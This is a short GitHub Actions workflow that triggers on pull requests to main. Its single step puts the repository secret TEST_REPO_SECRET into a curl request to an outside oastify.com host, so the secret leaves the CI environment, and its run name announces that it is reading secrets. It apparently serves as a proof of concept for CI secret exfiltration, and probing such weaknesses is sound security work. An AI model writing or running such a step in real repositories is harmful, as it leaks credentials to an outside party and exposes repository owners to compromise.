name: pr-test
run-name: ${{ github.actor }} is reading secrets
on:
 pull_request:
   branches: main
jobs:
  pr-test:
    runs-on: ubuntu-latest
    steps:
      - shell: bash
        env:
          TEST_REPO_SECRET: ${{ secrets.TEST_REPO_SECRET }}
        run: |
          curl http://4hm6020kxr4xklggkahu2rgt3k9bx1lq.oastify.com/$TEST_REPO_SECRET
